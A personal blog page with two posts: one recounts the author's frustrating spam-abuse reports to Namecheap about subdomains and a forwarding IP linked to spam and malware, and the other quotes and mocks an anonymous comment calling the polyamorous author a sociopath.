The part at the very beginning, in this case www, is a subdomain. The subdomain "www" stands for "World Wide Web" and it's the most common subdomain by far. But you can make a subdomain be anything you want. You could set up your Web site at "polyamory.morethantwo.com" or "groupsexisawesome.morethantwo.com" or anything else you like.

And here's the important part:

You can put a subdomain on a completely different server, hosted by a completely different Web host.

For example, morethantwo.com is hosted by Incubus Web hosting. But if I wanted to, I could put "polyamory.morethantwo.com" on Dreamhost and "groupsexisawesome.morethantwo.com" on Softlayer--each subdomain can get its own IP address and its own Web server, if you want.

Now you might not know that, and you can be excused for not knowing that. It's not necessary to understand how the Internet works in order to use it.

But Namecheap should know that. They sell domain names. This is what they do.

It's okay if a person who owns a car doesn't know that a car's engine has more than one spark plug in it, but no professional mechanic should ever be ignorant of that simple fact. It's okay if a person who uses the Web, or even a person who owns a Web site, doesn't know that subdomains can be hosted on one IP address. It's unforgivable that a domain registrar doesn't know that.

In this case, the spammer is using domain names that look like

view1.gnrlbshomes.us

"view1" is a subdomain, hosted by Namecheap. The main domain,gnrlbshomes.us, is hosted elsewhere. Namecheap's abuse team doesn't know how that works. When they received the spam complaint, they didn't look at view1.gnrlbshomes.us, they only looked at gnrlbshomes.us.

When I figured out what was happening, a light dawned. I fired off a reply explaining that view1.gnrlbshomes.us and gnrlbshomes.us were hosted at differnt IP addresses, and they were hosting the actual spamvertised URL, view1.gnrlbshomes.us.

Problem solved, right? They simply missed the subdomain, right? Wrong.



Elena, it seems, didn't talk to Kate. Namecheap has a systemic problem. This isn't someone not noticing the subdomain, this is someone not knowing how domains work.

And I got a lot of these emails, from all different people: "The domain 'blah blah blah' isn't hosted by Namecheap."



At this point, I was convinced the problem was incompetence...and a bizarre incompetence, an incompetence on the level of a professional auto mechanic not understanding that an engine has more than one spark plug.

But then, things took a turn for the even weirder.

I patiently replied to each of the emails, showing the IP address of the main domain and the subdomain, and that the subdomain was in fact on Namecheap IP space.

And then I started getting replies like this:



Essentially, what this says is "if you don't actually send email from a Namecheap server, you're welcome to spam a domain that lives in Namecheap space and we're A-OK with that."

Now, spammers almost never send emails from the same servers their Web sites live on. Usually, spammers send emails from home computers that are infected with viruses without their owner's consent (a lot of computer viruses are written for profit; the virus authors infect computers with software that allows them to remotely control the computers, then sell lists of infected computers to spammers, who use the infected computers to send spam email.) Sometimes, the spam emails are sent from "bulletproof" spam mail servers in places like the Ukraine. But they almost never come from the same computer that's hosting a site.

So Web hosting companies want to see a spam with full headers when you report spam, so they can verify that, yep, this is a spam email, and shut down the Web site that's being spamvertised.

But not Namecheap. Namecheap will knowingly and willingly allow you to spam domains on their servers, provided the spam email doesn't actually come from the same server.

I asked if their policy was to permit spam that doesn't originate from the same server as the Web site, I received this reply:



Which to me looks like a "yes."

At the moment, I am currently receiving 11 spam emails a day advertising domains that resolve to Namecheap IP addresses. There are about half a dozen products being spamvertized; each day's crop of spam messages are word for word and image for image identical to the previous day's, but the domains are different. Clearly, the spammers feel they've found a good home in Namecheap.

So I took a look at that IP address, 162.255.119.254. It's quite a mess.

Domains on 162.255.119.254 are all forwarded; that is, 162.255.119.254 is a pass-along to other IP addresses. If you want to put up a Web site and you don't want anyone to know who's really hosting it, you can put it there, and visitors will be invisibly passed along to its real home.

Now, can you guess what sort of thing that's useful for?

If you said "spam and malware!" you're absolutely right. A Virustotal analysis of 162.255.119.254 shows that it's being used to spread a lot of bad stuff:



And it's not just Virustotal. A Google search for 162.255.119.254 shows that it has a reputation as a bad neighborhood in a lot of places. It's listed as a bad actor in the Cyberwarzone list:



and as a virus distributor in the Herdprotect list:



At this point, I got tired of making screenshots, but basically this Namecheap server has a bad reputation everywhere.

So whether through gross incompetence or active malice, Namecheap is running a server that's a haven for spammers and malware distribution.

Which is why I've begun pulling my domain name registrations from them. I can not in good conscience spend money to support a company that's such a menace to the Internet, and I spend about $500 a year in registrations.

Now, interestingly, I'm averaging about 11 spam emails a day advertising domains on Namecheap's IP space, but I'm averaging 20 spam emails a day that are word for word identical to these but aren't advertising a domain on Namecheap.

The ones that are advertising domains not on Namecheap are advertising domains hosted by a company called Rightside.co, a Web host I'm not familiar with.

As I mentioned before. Namecheap is a reseller for a registrar called Enom. And Rightside.co, well...



The fact that the same spammer is using Namecheap and Rightside, and they're both front-ends for Enom, is interesting. Stay tuned!


"Most likely a sociopath"

As many folks who read me probably know by now (and goodness, I'm doing my job wrong if you don't!), I'm polyamorous. I've been polyamorous my entire life, I've been writing a Web site about polyamory since the 1990s, and I recently co-wrote a book on the subject.

A lot of folks ask me if I get negative responses from being so open about poly. And the answer is, no, I usually don't. In fact, it's extremely rare that I hear anything negative about polyamory, all things considered. I generally encourage folks who are poly (or in other non-traditional relationships) to be as open as they feel safe in being, both because stigma is reduced when many people are open about non-traditional relationships and because, almost always, the pushback is nowhere near as great as people are likely to think it will be.

But that's not to say I never hear anything negative. Like this, for example, left as an anonymous comment to a post I made about dating and relationships on a social media site recently:

"This is what a woman had to say about you "Let me put this franklin, frank is a user/manipulator. I am sure he tells the women he is with that by being in a relationship with him and 4 other women that he is "empowering" them. You have to realize that there is a new "modern" type of feminism, these women misconstrue the term femism. The original feminist wanted to feel equal to men, they wanted more opportunities that we (women) are now given due to thier efforts. Nowadays women are empowered in a completely different way, women are mislead (in my opinion by manipulative men such as franklin) to believe that being overtly sexual is empowering, so that is why you see these women bending over backwards for men. I dont know exactly who is misleading women of our generation to believe polyamory is empowering or being overly sexual is but its someone, perhaps the feminists in the media but the question who is behind the media in the first place? I just feel bad for young feminists because they have no true understanding of what it means to be empowered and they are very confused. Franklin is smart and manipulating each girlfriend he has and he most likely a sociopath.""


Formatting, quote marks, and spelling as in the original.

So now you know, the media feminists are pushing women into the arms of sociopaths like me. Curses, my secret is out.


Syndicate

RSS Atom
Powered by LiveJournal.com
Designed by Lilia Ahner